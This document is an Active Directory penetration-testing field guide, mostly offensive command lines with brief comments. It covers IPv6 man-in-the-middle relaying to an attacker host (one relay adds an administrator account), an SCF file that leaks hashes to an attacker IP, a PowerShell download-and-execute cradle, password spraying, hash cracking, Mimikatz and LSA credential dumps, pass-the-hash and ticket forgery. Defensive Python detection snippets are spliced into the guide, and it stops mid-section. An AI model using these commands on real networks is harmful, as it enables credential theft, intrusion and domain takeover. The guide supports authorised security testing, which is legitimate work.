
Active Directory Pentesting Guide

This document provides an overview of reconnaissance techniques for discovering assets, users, and credentials on a Windows network. It describes unauthenticated methods like port scanning and NULL sessions, as well as authenticated techniques using tools like BloodHound, CrackMapExec, and ldapdomaindump to dump information from Active Directory like computers, users, groups and their membership. Hashes and plain text credentials can then be extracted from Active Directory databases or cached on systems.

Uploaded by ehlaban

Table of Contents

RECONNAISSANCE .......... 3
IPV4 NETWORK ACCESS CONTROL (NAC) BYPASS .......... 4
UNAUTHENTICATED ASSET DISCOVERY .......... 5
UNAUTHENTICATED USER DISCOVERY .......... 6
AUTHENTICATED ASSET/USERNAME DISCOVERY .......... 8
PORT DISCOVERY .......... 10
VULNERABILITY IDENTIFICATION .......... 12
VULNERABILITY SCANNERS .......... 13
INITIAL FOOTHOLD .......... 14
DEFAULT CREDENTIALS .......... 15
ACQUIRE CREDENTIALS .......... 16
CRACKING HASHES .......... 21
WORDLISTS AND RULES AND MASKS .......... 22
WINDOWS VERTICAL PRIVILEGE ESCALATION .......... 24
REMOTE USER TO ADMIN .......... 25
WINDOWS HORIZONTAL PRIVILEGE ESCALATION .......... 27
LOGGED IN USERS .......... 28
REMOTE MIMIKATZ/LSA DUMPS FROM LOCAL ADMIN .......... 28
PASS THE HASH (PTH) .......... 29
PASS THE KEY (PTK) .......... 30
PASS THE TICKET (PTT) .......... 32
SILVER TICKET .......... 33
GOLDEN TICKET .......... 35
AUTOMATE LOCAL ADMIN TO DOMAIN ADMIN (NOISY) .......... 37
CREDENTIAL PILLAGING .......... 38
EXTRACT SAM & CACHED HASHES MANUALLY .......... 39
EXTRACT NTDS.DIT HASHES MANUALLY .......... 39
EXTRACT NTDS.DIT HASHES (AUTOMATED) .......... 39
FIND PLAINTEXT PASSWORDS .......... 40
WPA PSK STRING EXTRACTION .......... 42
WIRELESS .......... 44
WPA/WPA2 HASH CAPTURE WITH USERS .......... 45
WPA/WPA2 HASH CAPTURE WITHOUT USERS (PMKID) .......... 45
WPS .......... 46
ENTERPRISE WIRELESS .......... 46
EVIL TWIN (SOCIAL ENGINEERING) .......... 47
OPEN WIRELESS .......... 47
WEP WIRELESS .......... 47
METHODOLOGY .......... 49

Internal Security Assessment: Field Guide Page 1


INTERNAL RUN BOOK FOR MOST WINDOWS NETWORKS (QUICK ACCESS) .......... 50



RECONNAISSANCE



IPV4 NETWORK ACCESS CONTROL (NAC) BYPASS

Bypass IPv4 with IPv6


#Most defensive tools exclusively look at IPv4 addresses. Forcing traffic over IPv6 yields a high chance you will go undetected and be unchallenged.
#Use the Metasploit discovery modules below to determine whether IPv6 is in use.

auxiliary/scanner/discovery/ipv6_multicast_ping

auxiliary/scanner/discovery/ipv6_neighbor

auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement

SMB server
#Launch a man in the middle attack over IPv6 to SMB share.
[Link]
[Link]

mitm6 -i eth0

[Link] SMB_SHARE_NAME path/to/share

Responder
#Launch a man in the middle attack over IPv6.
[Link]
[Link]

mitm6 -i eth0

responder -I eth0 -wFv

ntlmrelayx
#Launch a man in the middle attack over IPv6.
[Link]
[Link]

mitm6 -hw icorp-w10 -d [Link] --ignore-nofqdn



[Link] -t ldaps://[Link] -wh attacker-wpad --delegate-access

[Link] -wh ATTACKER_IP -t smb://TARGET_IP/ -i

OR

[Link] -ip [Link] -t rpc://[Link] -c "net user xyzuser xyzpass /add && net localgroup Administrators xyzuser /add"

UNAUTHENTICATED ASSET DISCOVERY


#Various techniques to enumerate hosts and services
Private IPv4 Networks

[Link]/8

[Link]/12

[Link]/16

ARP Scan

netdiscover -i eth0

NetBIOS Scan

nbtscan <CIDR>

Limited Port Scan

nmap -sS -p 445,22,80 <CIDR> --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open

Ping Scan

nmap -sP <CIDR>



Mass Scan

masscan <CIDR> --top-ports 100

DNS/DC Enumeration

fierce -dns [Link]

OR

nmap --script dns-brute [Link]

UNAUTHENTICATED USER DISCOVERY

NULL Session
[Link]

[Link]

crackmapexec smb [Link] -u '' -p '' --users

OR

smbclient -N -L //[Link]

OR

rpcclient -N -U "" [Link]

rpcclient $> enumdomusers

OR

[Link] [Link] 500 50000 | tee -a [Link]

Anonymous Enumeration of AD

ldapsearch -LLL -x -H ldap://[Link] -b '' -s base '(objectclass=*)'



Username Enumeration
# Bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-[Link]='[Link]',userdb=[Link] [Link]



AUTHENTICATED ASSET/USERNAME DISCOVERY

Basic User and Host Dump of AD Computers


[Link]

ldapdomaindump -u DOMAIN\\notanadmin -p QWERTY <target>

Dump Active Directory Subnet


[Link]
[Link]

1) [Link] --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>

2) [Link] --hc-conso

OR

.\[Link] -username=testuser -password="testpass!" -domain="[Link]" -dc="[Link]" -unsafe

AD Dump
[Link]

bloodhound-python -d <DOMAIN> -u <USERNAME> -p <PASSWORD> -c all

#Computers

cat [Link]|jq -r '.computers[] | .Properties |.name'

#Users

cat [Link]|jq -r '.users[] | .Properties |.name'

#Admins

cat [Link]|jq -r '.users[] | .Properties |select(.admincount==true) |.name'

[Link]

crackmapexec ldap [Link] -u USERNAME -p PASSWORD --admin-count
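As an added example (not code from the field guide), the same triage the jq one-liners above perform, in Python, extended with a hygiene pass over the user properties. The property names (name, admincount, enabled, hasspn, dontreqpreauth) are assumed to match the collector's JSON, and the sample documents are constructed, not real collector output.

```python
"""Added example, not part of the field guide: triage BloodHound-style JSON the way
the jq filters above do, plus a hygiene pass a defender can act on.
Assumed layout: top-level "computers"/"users" arrays of objects whose "Properties"
carry "name", "admincount", "enabled", "hasspn" and "dontreqpreauth"."""
import json

# Constructed sample data in the assumed layout (not real collector output).
SAMPLE_USERS = json.dumps({"users": [
    {"Properties": {"name": "ALICE@CORP.LOCAL", "admincount": True, "enabled": True,
                    "hasspn": False, "dontreqpreauth": False}},
    {"Properties": {"name": "SVC_SQL@CORP.LOCAL", "admincount": True, "enabled": True,
                    "hasspn": True, "dontreqpreauth": False}},
    {"Properties": {"name": "BOB@CORP.LOCAL", "admincount": False, "enabled": True,
                    "hasspn": False, "dontreqpreauth": True}},
    {"Properties": {"name": "OLDADMIN@CORP.LOCAL", "admincount": True, "enabled": False,
                    "hasspn": False, "dontreqpreauth": False}},
]})
SAMPLE_COMPUTERS = json.dumps({"computers": [
    {"Properties": {"name": "DC01.CORP.LOCAL", "enabled": True}},
    {"Properties": {"name": "WS07.CORP.LOCAL", "enabled": True}},
]})


def names(doc, kind):
    """Equivalent of: jq -r '.<kind>[] | .Properties | .name'"""
    return [o["Properties"]["name"] for o in json.loads(doc).get(kind, [])]


def admins(doc):
    """Equivalent of: jq -r '.users[] | .Properties | select(.admincount==true) | .name'"""
    return [o["Properties"]["name"] for o in json.loads(doc)["users"]
            if o["Properties"].get("admincount") is True]


def hygiene_findings(doc):
    """Beyond the jq filters: privileged (admincount) accounts that carry an SPN,
    accounts that do not require Kerberos pre-authentication, and admincount
    left set on disabled accounts. Returns {finding: [names]}."""
    findings = {"admin_with_spn": [], "no_preauth": [], "disabled_admincount": []}
    for o in json.loads(doc)["users"]:
        p = o["Properties"]
        if p.get("admincount") and p.get("hasspn"):
            findings["admin_with_spn"].append(p["name"])
        if p.get("dontreqpreauth"):
            findings["no_preauth"].append(p["name"])
        if p.get("admincount") and not p.get("enabled", True):
            findings["disabled_admincount"].append(p["name"])
    return findings


if __name__ == "__main__":
    print("computers:", names(SAMPLE_COMPUTERS, "computers"))
    print("admins:", admins(SAMPLE_USERS))
    for finding, accounts in hygiene_findings(SAMPLE_USERS).items():
        print(f"{finding}: {accounts}")
```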

Computer Asset Dump


apt install ldap-utils

ldapsearch -LLL -H ldap://[Link] -x -D 'OURDOMAIN\user' -w 'thepassword' -b 'dc=ourdomain,dc=local' 'objectClass=computer' name

Local User Dump


[Link]

crackmapexec smb [Link]/24 -u USERNAME -p 'PASSWORD' --users

Basic User DNS Dump


[Link]

adidnsdump -u DOMAIN\\notanadmin <target>

Domain Admins Locator


[Link]

Get-SPN -type group -search "Domain Admins" -List yes -DomainController <target> -Credential domainuser | Format-Table -AutoSize

Dump Global Address List


[Link]

Get-GlobalAddressList -ExchHostname [Link] -Username notanadmin@[Link] -Password Password123



Dump Active Directory Usernames
[Link]

Get-ADUsernameFromEWS -Emaillist .\[Link]

PORT DISCOVERY

Rapid TCP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL [Link] --excludefile [Link] --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/[Link]

OR

masscan -iL [Link] --top-ports 100 -oX /tmp/[Link]

Default TCP Port Scan


#Scan for the most common/default ports. Slower results on a large scope.

nmap -iL [Link] --excludefile [Link] --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/[Link]

Rapid TCP/UDP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL [Link] --excludefile [Link] --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/[Link]



Extensive TCP Port Scan
#Scan for the most common ports of interest. Very slow on a large scope.

nmap -iL [Link] -p- --excludefile [Link] --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/[Link]



VULNERABILITY IDENTIFICATION



VULNERABILITY SCANNERS
Invest in a decent vulnerability scanner for internal assessments. This can help automate identification of low hanging fruit.

Paid Scanning Tools | Function
Tenable Nessus | Infrastructure Vulnerability Scanner, Light Application Analysis
Rapid7 Nexpose | Infrastructure Vulnerability Scanner, Light Application Analysis
Saint | Infrastructure Vulnerability Scanner, Light Application Analysis
BurpSuite | Heavy, Manual Web Application Analysis
Acunetix | Automated Web Application Analysis
Netsparker | Automated Web Application Analysis

Free Scanning Tools | Function
OpenVAS | Infrastructure Vulnerability Scanner, Light Application Analysis
Wapiti | Web Application Analysis only
NMAP Scripts | Infrastructure Vulnerability Scanner, Light Application Analysis
Metasploit Auxiliary Modules | Infrastructure Vulnerability Scanner, Light Application Analysis
Nuclei | Crowdsourced Infrastructure Vulnerability Scanner, Application Analysis



INITIAL FOOTHOLD



DEFAULT CREDENTIALS
#All of the tools below help to look for default credential usage. No one tool will find all the default credentials.
NMAP Default Creds

nmap --script http-default-accounts -p 80,81,280,591,593,832,981,1311,2480,4444,4445,4567,5000,5104,5800,7000,7001,7002,8008,8042,8088,8222,8243,8280,8281,8333,8530,8531,8887,8888,9080,9981,12443,12043,12046,16080,18091,18092,8080,443,8443,8081,9090,9091,8000,10443,22,21,23 -iL [Link] -oX /tmp/nmap_output.xml

Nuclei Cred Scan


#HTTP credential scanner.
[Link]

nuclei -l [Link] -t /root/nuclei-templates/default-logins

Changeme Cred Scan


#HTTP scanner by default, has support for SSH, SSH keys, and SNMP.
[Link]

[Link] nmap_output.xml

Manual Login Identification


[Link]

cat [Link] | httpx -threads 500 -ms "assword"

EyeWitness Active Cred Scan


#HTTP credential scanner.
[Link]



Eyewitness -x default_creds.xml --active-scan --web

BruteSpray Cred Scan


#Imports an nmap XML file, and scans for the below supported services.
• ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin,
smbnt, smtp, svn, vmauthd, snmp
[Link]

python [Link] --file nmap_output.xml --threads 5 --hosts 5

Brutex Cred Scan


#Automatically brute force all logins running on a target.
[Link]

brutex <target>

Metasploit Cred Scans


#Miscellaneous scanner modules for specific services and goals.

use auxiliary/scanner/*

ACQUIRE CREDENTIALS

AD CS Abuse
[Link]

[Link]

python3 [Link] <attacking machine's IP> <target Domain Controller's IP>

cat base64 | base64 -d > [Link]

python3 [Link] [Link]/DC01NAME\$ -cert-pfx [Link] [Link]

KRB5CCNAME=[Link] python3 [Link] [Link]/DC01\$ -key e19fd...blah

crackmapexec ldap [Link] -u DC01\$ -H 6e02...truncated --admin-count

KRB5CCNAME=[Link] python3 [Link] kerberos+ccache://[Link]\\DC01\$:[Link]@[Link] cifs/[Link]@[Link] Administrator@[Link] [Link] -v

export KRB5CCNAME='/path/to/[Link]'

[Link] [Link]/Administrator@[Link] -k -no-pass

SMB relay/IPv6 DNS poison


[Link]
[Link]

crackmapexec smb [Link]/24 --gen-relay-list [Link]

mitm6 -i eth0 -d [Link]

[Link] -6 -wh $attacker_ip -of loot -tf [Link] -smb2support

Mitm6, ntlmrelayx and RBCD


[Link]
[Link]

mitm6 -hw icorp-w10 -d [Link] --ignore-nofqdn

[Link] -t ldaps://[Link] -wh attacker-wpad --delegate-access

[Link] -spn cifs/[Link] [Link]/NEW_PC_NAME\$ -impersonate admin

export KRB5CCNAME=[Link]

[Link] -k -no-pass [Link]

SCF Upload
#SMB Share File attack.



Create an SCF file with the following:

[Shell]
Command=2
IconFile=\\<attacker IP>\share\[Link]
[Taskbar]
Command=ToggleDesktop

Upload to the share.

responder -I eth0 -v
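The defensive counterpart of the SCF trick above, as an added example that is not part of the field guide: a share audit that parses every .scf file under a directory (for instance a mounted share) and flags any whose IconFile is a UNC path to a host that is not an approved file server. The allowed-host list and the sample file contents are constructed for this example.

```python
"""Added example, not the field guide's code: find planted SCF files on a share.
An SCF is a tiny INI-style file; the IconFile key pointing at \\host\share is what
makes Explorer authenticate outward as soon as the folder is browsed."""
import os
import re
import tempfile

# \\host\... at the start of the IconFile value; group 1 is the host.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\", re.IGNORECASE)


def parse_scf(text):
    """Parse the INI-like SCF body into {section: {key: value}} (keys lower-cased)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def scf_icon_host(text):
    """Return the UNC host referenced by [Shell] IconFile, or None if it is a local path."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    m = UNC_RE.match(icon)
    return m.group(1).lower() if m else None


def suspicious_scf_files(root, allowed_hosts):
    """Walk `root` and return (path, host) for every .scf whose IconFile points at a
    UNC host outside `allowed_hosts`. Extension match is case-insensitive, as in Explorer."""
    hits = []
    allowed = {h.lower() for h in allowed_hosts}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    host = scf_icon_host(fh.read())
            except OSError:
                continue
            if host and host not in allowed:
                hits.append((path, host))
    return hits


# Constructed samples: one SCF pointing at an unapproved host, one benign local one.
PLANTED = ("[Shell]\r\nCommand=2\r\nIconFile=\\\\10.0.0.99\\share\\icon.ico\r\n"
           "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
BENIGN = ("[Shell]\r\nCommand=2\r\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n"
          "[Taskbar]\r\nCommand=ToggleDesktop\r\n")


def demo():
    """Write both samples into a temporary tree, scan it, and return the flagged hosts."""
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "Finance"))
        with open(os.path.join(d, "Finance", "planted.scf"), "w") as fh:
            fh.write(PLANTED)
        with open(os.path.join(d, "Show Desktop.scf"), "w") as fh:
            fh.write(BENIGN)
        # Assumed approved file server name for the example.
        return sorted(host for _, host in suspicious_scf_files(d, ["fileserver01"]))


if __name__ == "__main__":
    print(demo())  # ['10.0.0.99']
```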

LLMNR/NBTNS/mDNS poisoning – Capture Hashes

responder -I eth0 -rPv

Find Hosts with SMB Signing Disabled

crackmapexec smb <CIDR> --gen-relay-list [Link]

LLMNR/NBTNS/mDNS poisoning – Relay Hashes


#Configure Responder to redirect user auth. In [Link], set SMB, HTTP and HTTPS to OFF in the list of servers to start, then:

responder -I eth0 -v

[Link] -tf [Link]

Devices with LDAP enabled


Finding printers
[Link]
[Link]
Manual Exploit

Search for default credentials on printers with LDAP enabled

netcat -l -vv -p 444



Initiate an LDAP query.

Seth MiTM RDP Connections


[Link]

[Link] <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP>

Resource-based Constrained Delegation


[Link]

mitm6 -i eth0 -d <domain>

[Link] -t ldaps://<DomainController> -wh attacker-wpad --delegate-access

export KRB5CCNAME=<TGS_ccache_file>

[Link] -k -no-pass <VictimPC>

Password Spray
Collect usernames from the internet.
• Theharvester - [Link]
• Linkedint - [Link]
• Raven - [Link]
• [Link]
• [Link] - $4.49 purchase required
• Scylla - [Link]
• Authenticated Asset/Username Discovery Section
[Link]

[Link] -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

Crackmapexec

crackmapexec <protocol> <target(s)> -u username1 -p password1 password2

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1



crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

[Link]
#For MS Cloud services only

[Link]
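Detection logic for the spray pattern described above (many accounts, one or two attempts each, paced to stay under the lockout threshold), as an added example that is not part of the field guide. It runs over constructed failed-logon records in a simplified CSV layout assumed for this example; real 4625 events carry the same fields (account, source address, status) in XML.

```python
"""Added example, not the field guide's code: tell a password spray (one source,
many accounts, few attempts each) apart from a single-account brute force in
failed-logon records. Input layout is an assumption for this example:
"<iso time>,<event id>,<account>,<source ip>,<status>"."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: ten accounts hit once each from 10.0.5.23 (spray shape),
# then one account hit six times from 10.0.7.9 (brute-force shape).
SAMPLE_LOG = """\
2024-03-01T09:00:01,4625,alice,10.0.5.23,0xC000006A
2024-03-01T09:00:02,4625,bob,10.0.5.23,0xC000006A
2024-03-01T09:00:03,4625,carol,10.0.5.23,0xC000006A
2024-03-01T09:00:04,4625,dave,10.0.5.23,0xC000006A
2024-03-01T09:00:05,4625,erin,10.0.5.23,0xC000006A
2024-03-01T09:00:06,4625,frank,10.0.5.23,0xC000006A
2024-03-01T09:00:07,4625,grace,10.0.5.23,0xC000006A
2024-03-01T09:00:08,4625,heidi,10.0.5.23,0xC000006A
2024-03-01T09:00:09,4625,ivan,10.0.5.23,0xC000006A
2024-03-01T09:00:10,4625,judy,10.0.5.23,0xC000006A
2024-03-01T09:01:00,4625,alice,10.0.7.9,0xC000006A
2024-03-01T09:01:05,4625,alice,10.0.7.9,0xC000006A
2024-03-01T09:01:09,4625,alice,10.0.7.9,0xC000006A
2024-03-01T09:01:15,4625,alice,10.0.7.9,0xC000006A
2024-03-01T09:01:20,4625,alice,10.0.7.9,0xC000006A
2024-03-01T09:01:25,4625,alice,10.0.7.9,0xC000006A
"""


def parse(lines):
    """Keep only failed logons (4625) as (time, account, source, status) tuples."""
    events = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ts, eid, account, src, status = line.split(",")
        if eid == "4625":
            events.append((datetime.fromisoformat(ts), account.lower(), src, status))
    return events


def detect_spray(events, window=timedelta(minutes=30), min_accounts=8, max_per_account=3):
    """Return {source_ip: set(accounts)} for sources that failed against at least
    `min_accounts` distinct accounts inside `window` while no single account saw
    more than `max_per_account` failures (the under-lockout pacing of a spray)."""
    by_src = defaultdict(list)
    for ts, acct, src, _ in sorted(events):
        by_src[src].append((ts, acct))
    alerts = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # slide the window forward
                start += 1
            counts = defaultdict(int)
            for _, acct in evs[start:end + 1]:
                counts[acct] += 1
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                alerts[src] = set(counts)
    return alerts


def bruteforce_sources(events, threshold=5):
    """Complementary rule: one account, repeated failures from one source.
    Returns {(source, account): failure_count} for pairs at or above `threshold`."""
    counts = defaultdict(int)
    for _, acct, src, _ in events:
        counts[(src, acct)] += 1
    return {k: v for k, v in counts.items() if v >= threshold}


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("spray sources:", {s: sorted(a) for s, a in detect_spray(ev).items()})
    print("single-account brute force:", bruteforce_sources(ev))
```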



CRACKING HASHES



WORDLISTS AND RULES AND MASKS

Wordlists
• [Link]
• [Link]
• [Link]
• [Link]

Create Company Specific Wordlist


#Businesses often share a common password related to the business.
[Link]

cewl -d 3 -m 4 -w /tmp/[Link] [Link]

#Burp Suite extension (requires Jython) that builds a wordlist from the words found in the target's browsed site content, the same idea as cewl applied to the Burp sitemap.


[Link]

Usage:

1. Point Burp Suite to Jython in the Extender > Options tab.

2. Install this extension manually in the Extender > Extensions tab.

3. Select an option for extension output (File, Console or UI).

4. Right-click on any element in the Target tab's hierarchical sitemap.

5. Select the Extensions > Create wordlist context menu item.

Common Hashes to Crack (Hashcat)


900 | MD4
0 | MD5
3000 | LM
1000 | NTLM
1100 | Domain Cached Credentials (DCC), MS Cache
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2
5500 | NetNTLMv1
5600 | NetNTLMv2
2500 | WPA/WPA2
13100 | Kerberos 5 TGS-REP etype 23 (Kerberoast)
18200 | Kerberos 5 AS-REP etype 23 (ASREPRoast)

Convert MSCache2 from crackmapexec to Hashcat Format

cat /root/.cme/logs/*.cached | cut -d : -f2- > mscach2_hashes.txt

Wordlist/No rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt

Wordlist W/rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt -r /usr/share/hashcat/rules/[Link]

Bruteforce No Special Char

hashcat -m 5600 -O -w 3 admin_hash.txt -a 3

Crack IPMI

hashcat --username -m 7300 -O -w 3 admin_hash.txt fav_wordlist.txt -r /usr/share/hashcat/rules/[Link]

Combination Attack

hashcat -m 0 -a 1 [Link] [Link] [Link]



WINDOWS VERTICAL PRIVILEGE
ESCALATION



REMOTE USER TO ADMIN

AD CS Abuse
Certipy

certipy 'example/john:Passw0rd@[Link]' auto

ASREPRoast
Crackmapexec

crackmapexec ldap <Domain Controller> -u [Link] -p '' --asreproast [Link]

crackmapexec ldap <Domain Controller> -u username -p pass --asreproast [Link]

Kerberoast
[Link] (Linux)

[Link] -request [Link]/notanadmin

crackmapexec ldap <Domain Controller> -u username -p pass --kerberoasting [Link]

[Link] (Windows)

.\[Link] kerberoast /outfile:

PowerShell

$webreq = [[Link]]::Create('[Link]a/module_source/credentials/Invoke-Kerberoast.ps1'); $resp=$[Link](); $respstream=$[Link](); $reader=[[Link]]::new($respstream); $content=$[Link](); IEX($content); Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ASCII [Link]

Extract GPP Credentials



[Link]

crackmapexec smb DC_IP_ADDR -u notanadmin -p Password123 -d domain -M gpp_password

MS Exchange – Domain Escalation


[Link]

[Link] -t ldap://[Link] --escalate-user notanadmin

python [Link] -ah [Link] [Link] -u notanadmin -d [Link]

[Link] [Link]/notanadmin@[Link] -just-dc

Escalate via MSSQL

1) crackmapexec mssql [Link] -u username -p password --local-auth -M mssql_priv

2) crackmapexec mssql [Link] -u username -p password --local-auth -M mssql_priv -o ACTION=privesc

3) crackmapexec mssql [Link] -u username -p password --local-auth -x whoami

4) crackmapexec mssql [Link] -u username -p password --local-auth -M mssql_priv -o ACTION=rollback

Active Directory Low Hanging Fruit Check


[Link]

[Link] --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>



WINDOWS HORIZONTAL PRIVILEGE
ESCALATION



LOGGED IN USERS

Crackmapexec

crackmapexec smb [Link]/24 -u username -p Password123 -d domain --loggedon-users

Metasploit

use auxiliary/scanner/smb/psexec_loggedin_users

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

Pingcastle

[Link] --graph --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>

Bloodhound
[Link]

neo4j start

python [Link] -u <USERNAME> -p <PASSWORD> -d <DOMAIN_NAME> -dc <DOMAIN_CONTROLLER_HOSTNAME>

Bloodhound Python
[Link]

python3 [Link] -d <domain> -u username -p password -c All

Bloodhound – LSASSY

crackmapexec smb [Link]/24 -d [Link] -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound

REMOTE MIMIKATZ/LSA DUMPS FROM LOCAL ADMIN

Dump LSA secrets



Crackmapexec
[Link]

crackmapexec smb [Link] -u localadmin -p Password123 -d domain --lsa

Metasploit

use auxiliary/scanner/smb/impacket/secretsdump

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

LSASSY

crackmapexec smb <target> -u administrator -p pass -M lsassy

Dump with Mimikatz


Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -M mimikatz

Metasploit

exploit/windows/smb/psexec_psh

load kiwi

creds_all

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

CredCrack
[Link]

[Link] -f [Link] -d domain -u localadmin -l <target>

PASS THE HASH (PTH)



Dump SAM file (1)
Crackmapexec

crackmapexec smb [Link] -u localadmin -p Password123 -d domain --sam

Metasploit

use exploit/windows/smb/psexec > load kiwi > creds_all

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

Pass the Hash (2)


Crackmapexec

crackmapexec smb [Link] -u localadmin -H 8846F7EAEE8FB117AD06BDD830B7586C --local-auth

Metasploit

use exploit/windows/smb/psexec

Set: RHOSTS, SMBUser, SMBPass (as LM:NTLM), run

xfreerdp

xfreerdp /u:administrator /d:[Link] /pth:7337532fd3bf3abfaef5a9b5bb05a9d8 /v:[Link] /size:800x600

PASS THE KEY (PTK)

Request The TGT via Linux (1)


Impacket
[Link]
#Request the TGT with hash



python [Link] <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

OR

#Request the TGT with aesKey

python [Link] <domain_name>/<user_name> -aesKey <aes_key>

OR

#Request the TGT with password

python [Link] <domain_name>/<user_name>:[password]

Pop Shell via Linux (2)


#Set the TGT from Impacket

export KRB5CCNAME=<TGT_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


[Link]
#Request the TGT with hash

.\[Link] asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Pop Shell via Windows (2)



#Execute a cmd on the remote machine

.\[Link] -accepteula \\<remote_hostname> cmd

PASS THE TICKET (PTT)


Harvest tickets on Linux host (1)

grep default_ccache_name /etc/[Link]

OR

#Default ccache location when krb5.conf does not override it: /tmp/krb5cc_%{uid}

ls -la /tmp/krb5cc_*

OR

#If running as root, tickey injects into other users' processes to harvest their tickets. Copy it to a folder reachable by those users.

[Link]

cp tickey /tmp/tickey && /tmp/tickey -i

Use Ticket via Linux (2)


#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass



Harvest tickets from Windows (1)
Mimikatz
[Link]

mimikatz # sekurlsa::tickets /export

Rubeus in PowerShell
[Link]

.\Rubeus dump

Inject Ticket via Windows (2)


Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

Rubeus

.\[Link] ptt /ticket:<ticket_kirbi_file>

PsExec

.\[Link] -accepteula \\<remote_hostname> cmd

SILVER TICKET

Forge The TGS via Linux (1)


[Link]
#Generate the TGS with the service account's NTLM hash via impacket

python [Link] -nthash <service_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

#Generate the TGS with the service account's AES key via impacket

python [Link] -aesKey <service_aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

Set Ticket via Linux (2)


#Use the TGS with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Forge The TGS via Windows (1)


[Link]
#Generate the TGS with the service account's NTLM hash via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<service_ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

#Generate the TGS with the service account's AES key via Mimikatz

